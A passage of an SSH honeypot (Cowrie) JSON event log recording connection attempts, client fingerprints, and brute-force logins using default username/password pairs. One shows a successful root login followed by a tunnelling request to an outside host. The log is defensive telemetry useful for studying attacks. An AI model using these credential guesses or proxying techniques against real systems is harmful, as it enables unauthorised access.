-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-28T00:35:37.827059Z","src_ip":"171.243.150.245","session":"66f198822cc5"}
{"eventid":"cowrie.login.failed","username":"user","password":"user","message":"login attempt [user/user] failed","sensor":"my-vps","timestamp":"2025-08-28T00:35:39.197613Z","src_ip":"171.243.150.245","session":"66f198822cc5"}
{"eventid":"cowrie.session.closed","duration":"3.0","message":"Connection lost after 3.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T00:35:40.423116Z","src_ip":"171.243.150.245","session":"66f198822cc5"}
{"eventid":"cowrie.session.connect","src_ip":"171.243.151.203","src_port":43318,"dst_ip":"1.2.3.4","dst_port":22,"session":"57a8e2b90765","protocol":"ssh","message":"New connection: 171.243.151.203:43318 (1.2.3.4:22) [session: 57a8e2b90765]","sensor":"my-vps","timestamp":"2025-08-28T00:36:46.120053Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-28T00:36:46.141829Z","src_ip":"171.243.151.203","session":"57a8e2b90765"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-28T00:36:46.338178Z","src_ip":"171.243.151.203","session":"57a8e2b90765"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":58500,"dst_ip":"1.2.3.4","dst_port":22,"session":"0dce4972a732","protocol":"ssh","message":"New connection: 212.227.125.160:58500 (1.2.3.4:22) [session: 0dce4972a732]","sensor":"my-vps","timestamp":"2025-08-28T00:36:52.598059Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-28T00:36:52.600245Z","src_ip":"212.227.125.160","session":"0dce4972a732"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-28T00:36:52.865000Z","src_ip":"212.227.125.160","session":"0dce4972a732"}
{"eventid":"cowrie.session.connect","src_ip":"171.243.150.245","src_port":38696,"dst_ip":"1.2.3.4","dst_port":22,"session":"c984b1097f3c","protocol":"ssh","message":"New connection: 171.243.150.245:38696 (1.2.3.4:22) [session: c984b1097f3c]","sensor":"my-vps","timestamp":"2025-08-28T00:36:53.400586Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-28T00:36:53.401720Z","src_ip":"171.243.150.245","session":"c984b1097f3c"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-28T00:36:53.615148Z","src_ip":"171.243.150.245","session":"c984b1097f3c"}
{"eventid":"cowrie.login.failed","username":"squid","password":"squid","message":"login attempt [squid/squid] failed","sensor":"my-vps","timestamp":"2025-08-28T00:36:54.259868Z","src_ip":"171.243.150.245","session":"c984b1097f3c"}
{"eventid":"cowrie.login.failed","username":"config","password":"config","message":"login attempt [config/config] failed","sensor":"my-vps","timestamp":"2025-08-28T00:36:55.421900Z","src_ip":"171.243.151.203","session":"57a8e2b90765"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T00:36:55.583550Z","src_ip":"171.243.150.245","session":"c984b1097f3c"}
{"eventid":"cowrie.login.failed","username":"support","password":"support","message":"login attempt [support/support] failed","sensor":"my-vps","timestamp":"2025-08-28T00:36:59.204320Z","src_ip":"212.227.125.160","session":"0dce4972a732"}
{"eventid":"cowrie.session.closed","duration":"8.6","message":"Connection lost after 8.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T00:37:01.186138Z","src_ip":"212.227.125.160","session":"0dce4972a732"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43747,"dst_ip":"1.2.3.4","dst_port":22,"session":"15fa32b768dc","protocol":"ssh","message":"New connection: 212.227.235.229:43747 (1.2.3.4:22) [session: 15fa32b768dc]","sensor":"my-vps","timestamp":"2025-08-28T00:37:03.859934Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T00:37:03.861029Z","src_ip":"212.227.235.229","session":"15fa32b768dc"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":44047,"dst_ip":"1.2.3.4","dst_port":22,"session":"d7d89181a40d","protocol":"ssh","message":"New connection: 212.227.235.229:44047 (1.2.3.4:22) [session: d7d89181a40d]","sensor":"my-vps","timestamp":"2025-08-28T00:37:03.998121Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T00:37:03.999404Z","src_ip":"212.227.235.229","session":"d7d89181a40d"}
{"eventid":"cowrie.client.kex","hassh":"6a77bbd6ef48d6a9959a47aa4a42a505","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 6a77bbd6ef48d6a9959a47aa4a42a505","sensor":"my-vps","timestamp":"2025-08-28T00:37:04.134274Z","src_ip":"212.227.235.229","session":"d7d89181a40d"}
{"eventid":"cowrie.login.success","username":"root","password":"broadguam1","message":"login attempt [root/broadguam1] succeeded","sensor":"my-vps","timestamp":"2025-08-28T00:37:04.538898Z","src_ip":"212.227.235.229","session":"d7d89181a40d"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"178.20.45.148","dst_port":80,"src_ip":"212.227.235.229","src_port":0,"message":"direct-tcp connection request to 178.20.45.148:80 from 0.0.0.0:0","sensor":"my-vps","timestamp":"2025-08-28T00:37:04.675172Z","session":"d7d89181a40d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":35852,"dst_ip":"1.2.3.4","dst_port":22,"session":"95bfabc86973","protocol":"ssh","message":"New connection: 212.227.125.160:35852 (1.2.3.4:22) [session: 95bfabc86973]","sensor":"my-vps","timestamp":"2025-08-28T00:37:06.271868Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-28T00:37:06.281134Z","src_ip":"212.227.125.160","session":"95bfabc86973"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-28T00:37:06.527813Z","src_ip":"212.227.125.160","session":"95bfabc86973"}
{"eventid":"cowrie.session.connect","src_ip":"194.233.79.134","src_port":39292,"dst_ip":"1.2.3.4","dst_port":22,"session":"b8f1589ece21","protocol":"ssh","message":"New connection: 194.233.79.134:39292 (1.2.3.4:22) [session: b8f1589ece21]","sensor":"my-vps","timestamp":"2025-08-28T00:37:11.844380Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T00:37:11.845255Z","src_ip":"194.233.79.134","session":"b8f1589ece21"}
{"eventid":"cowrie.session.closed","duration":"26.0","message":"Connection lost after 26.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T00:37:12.118311Z","src_ip":"171.243.151.203","session":"57a8e2b90765"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T00:37:12.682837Z","src_ip":"194.233.79.134","session":"b8f1589ece21"}
{"eventid":"cowrie.login.failed","username":"test","password":"test","message":"login attempt [test/test] failed","sensor":"my-vps","timestamp":"2025-08-28T00:37:14.665778Z","src_ip":"194.233.79.134","session":"b8f1589ece21"}
{"eventid":"cowrie.session.closed","duration":"4.4","message":"Connection lost after 4.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T00:37:16.227666Z","src_ip":"194.233.79.134","session":"b8f1589ece21"}
{"eventid":"cowrie.login.failed","username":"config","password":"config","message":"login attempt [config/config] failed","sensor":"my-vps","timestamp":"2025-08-28T00:37:16.647543Z","src_ip":"212.227.125.160","session":"95bfabc86973"}
{"eventid":"cowrie.session.closed","duration":"12.3","message":"Connection lost after 12.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T00:37:18.563669Z","src_ip":"212.227.125.160","session":"95bfabc86973"}
{"eventid":"cowrie.session.connect","src_ip":"171.243.151.203","src_port":47760,"dst_ip":"1.2.3.4","dst_port":22,"session":"7e2ab3a0591d","protocol":"ssh","message":"New connection: 171.243.151.203:47760 (1.2.3.4:22) [session: 7e2ab3a0591d]","sensor":"my-vps","timestamp":"2025-08-28T00:37:52.006989Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-28T00:37:52.070922Z","src_ip":"171.243.151.203","session":"7e2ab3a0591d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":6101,"dst_ip":"1.2.3.4","dst_port":22,"session":"2740a19b71d7","protocol":"ssh","message":"New connection: 212.227.235.229:6101 (1.2.3.4:22) [session: 2740a19b71d7]","sensor":"my-vps","timestamp":"2025-08-28T00:37:53.255092Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-OPENSSH_7.9","message":"Remote SSH version: SSH-2.0-OPENSSH_7.9","sensor":"my-vps","timestamp":"2025-08-28T00:37:53.567256Z","src_ip":"212.227.235.229","session":"2740a19b71d7"}
{"eventid":"cowrie.client.kex","hassh":"b21d7cdcc8133dc2b430d1a039fece20","hasshAlgorithms":"diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group14-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256;chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,aes128-cbc,aes192-cbc,aes256-cbc,blowfish-cbc,cast128-cbc,3des-cbc;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group14-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256"],"keyAlgs":["ssh-rsa","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","aes128-cbc","aes192-cbc","aes256-cbc","blowfish-cbc","cast128-cbc","3des-cbc"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: b21d7cdcc8133dc2b430d1a039fece20","sensor":"my-vps","timestamp":"2025-08-28T00:37:53.966016Z","src_ip":"212.227.235.229","session":"2740a19b71d7"}
